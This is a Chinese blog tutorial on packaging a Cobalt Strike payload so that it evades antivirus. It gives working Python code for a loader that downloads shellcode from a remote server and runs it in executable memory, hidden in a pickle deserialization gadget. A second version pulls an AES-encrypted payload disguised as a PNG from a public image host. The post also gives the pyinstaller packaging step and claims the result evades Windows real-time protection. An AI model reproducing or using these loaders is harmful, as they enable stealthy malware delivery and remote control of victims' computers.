Python反序列化免杀上线CS

最新推荐文章于 2024-06-03 10:51:09 发布
最新推荐文章于 2024-06-03 10:51:09 发布
阅读量797 收藏 8
点赞数 1
文章标签: python 开发语言 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57686163/article/details/126444240
版权

  • 首先使用cs生成一个64位的Python Payload
    在这里插入图片描述
    在这里插入图片描述

  • 将生成的文件存放到文件夹中,由于我的cs运行在kali虚拟机上,我将payload放到web目录下,方便其他主机访问获取
    在这里插入图片描述

  • 我的kali虚拟机IP为192.168.204.128,访问获取payload
    在这里插入图片描述

  • 截取其中的Payload,并进行base64编码,我使用的是科来编码工具
    在这里插入图片描述

  • 把这一串子base64放到公网服务器上,并开启web服务,我这里就用另一台虚拟机充当公网服务器,IP为192.168.204.3
    在这里插入图片描述

  • 使用以下脚本将 Payload进行反序列化,脚本中通过web服务获取payload

import pickle
import base64

shellcode = """
import ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://192.168.204.3/py.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""


class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))

ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
  • 为了起到免杀效果,将shellcode进行序列化后在进行base64编码,但仅仅这样并不能绕过windows的,所以将上列脚本进行AES加密后在base-64编码
    在这里插入图片描述
    在这里插入图片描述
  • 创建一个文本,添加png幻术头89504E47和加密后的数据,把我们的payload伪装成一个图片
    在这里插入图片描述
  • 将图片上传到妙速图床,后面可以通过网络获取payload
    在这里插入图片描述
    在这里插入图片描述
  • 编写脚本,获取我们上传的图片,并截取payload,然后解密通过反序列化运行
import base64
import pickle as json
import ctypes
import urllib.request
import codecs
from Crypto.Cipher import AES

shell = urllib.request.urlopen('http://i.miaosu.bid/data/f_87013496.png').read()[8:]
shell = shell.strip(b'\r\n')
pick = f"""
json.loads(base64.b64decode(AES.new(b'ysIx0oKueJV15dkA4P3WvDjnq9giB62=', AES.MODE_CBC, b'jbMNXRf954m0WUzQ').decrypt(base64.b64decode(({shell})))))
"""
class A(object):
    def __reduce__(self):
        return (exec, (pick,))
ret = json.dumps(A())
json.loads(ret)
  • 使用pyInstaller将该脚本打包生产exe文件:pyinstaller -F cs_pickle_load.py --noconsole
    在这里插入图片描述
  • 我将该exe文件放到另一个windows虚拟机上,该虚拟机IP为192.168.204.135
    在这里插入图片描述
    在这里插入图片描述
  • windows在开启实时保护的情况下,依然成功上线
    在这里插入图片描述
傲然*
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python反序列化免杀上线CS:两次编码绕过
Miracle_ze的博客
08-21 2004
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
红蓝对抗经验分享:CS免杀姿势
m0_59598029的博客
09-13 541
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
简单免杀绕过和利用上线的GoCS
最新发布
2401_84488537的博客
06-03 1094
第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。这个版本很基础,很简单进行利用,所以只能在简单环境下利用,希望后面能加入更多的元素,让这个插件适应更多复杂环境。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7369
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
新版掩日免杀——搭配CS使用测试
ZxC789456302的博客
10-05 1715
使用工具:掩日免杀 环境需求: 64位 Windows 7 或以上操作系统 .net framework 4.5 或更高
cs免杀之基于混淆和加壳
weixin_54855337的博客
04-14 4053
写在前面 最近也是没什么状态以及被身边人,事,物所受影响,环境对自己的影响也是非常大,但是随着时间的变化一切也都会改变,离群所居者,不是神灵,就是野兽,所以说需要脱离这种状态,找到自己人生中明确的方向,不能一天天的萎靡不正 简单进行混淆和加壳 其实早在去年11月左右就玩过一点cs,但是那个时候还是懵懵懂懂,虽然现在也是一样的 打开服务端,192.168.4.191为自己的ip也可以127.0.0.1,然后123123为连接密码 使用java或者bat再或者sh打开都可以,然后就是双..
Cobalt Strike安装配置和连接
soldi_er的博客
04-16 2849
文章目录寻找资源1.官网渠道2.Github社区参考 寻找资源 1.官网渠道   先看官网,地址https://www.cobaltstrike.com/   访问官网,点击Download,填写资料申请试用,竟然不支持中国地区试用   trials are only available to users in the United States, Australia, Canada, the European Union, Japan, New Zealand, Singapore, and the U
python反序列化-分离免杀1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是“分离免杀”策略。 免杀技术的主要目标是让恶意代码避开安全软件的检测,从而在目标系统上成功执行。常见的免杀方法包括修改特征码、使用花...
浅析Python 序列化与反序列化
09-16
主要介绍了Python 序列化与反序列化的相关资料,文中讲解非常细致,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下
Python中shelve序列化与反序列化
12-22
序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;反之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value...
python3序列化与反序列化用法实例
09-22
主要介绍了python3序列化与反序列化用法,实例分析了Python3使用pickle模块针对字符串进行序列化操作的相关技巧,需要的朋友可以参考下
python序列化反序列化和异常处理笔记.doc
10-01
python序列化反序列化和异常处理笔记
CobaltStrike使用插件实现免杀
m0_74025111的博客
04-24 462
免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。
简单快捷的 CS 一键免杀插件 CSx3Ldr
yutianovo的博客
02-20 669
Cobalt Strike插件
木马免杀代码之python反序列化分离免杀
04-15 917
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
pyinstaller+cs生成免杀exe过杀毒软件
AerYinan的博客
01-01 2545
项目工具 : CobaltStrike(CSpython pyinstaller 通过cs免杀: 使用cs制作免杀 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201231170617315.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0FlcllpbmFu,size_16,color_FFFFF
实用cs、mimikatz免杀virscan
课嗨教育的专栏
04-03 1079
免杀准备工具: Restorator SigThief VMProtect壳 一、免杀mimikatz 准备工具:mimikatz 第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。) 将原有的图标及版本资源删除后拖入附带资源的图标及版本。保存mimikatz。 简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
CS分离免杀实践
痴人说梦梦中人
08-02 2131
CS分离免杀实战一、原理简述二、环境配置三、本地测试1.生成shellcode2.代码变形3.pyinstaller打包4.免杀测试 本次实践参考小刚师傅的教程,详细原理请看原文:https://mp.weixin.qq.com/ 一、原理简述           通过python requests远程下载经过base64编码后的shellcode和loader,然后解码通过exec函数先执行loader,
Python反序列化免杀执行代码
12-07
为了Python反序列化免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 4. 编写exp.py文件进行反序列化,加载恶意shellcode。 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。 以下是具体操作步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 ```python import requests import base64 url = 'http://yourserver.com/shellcode_bs64.txt' response = requests.get(url) shellcode = response.content # 对shellcode进行反序列化并进行base64编码 serialized = base64.b64encode(pickle.dumps(shellcode)).decode('utf-8') ``` 4. 编写exp.py文件进行反序列化,加载恶意shellcode。 ```python import requests import base64 import pickle url = 'http://yourserver.com/shellcode.py' response = requests.get(url) serialized = response.content # 对序列化的数据进行反序列化 data = pickle.loads(base64.b64decode(serialized)) # 加载恶意shellcode exec(data) ``` 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值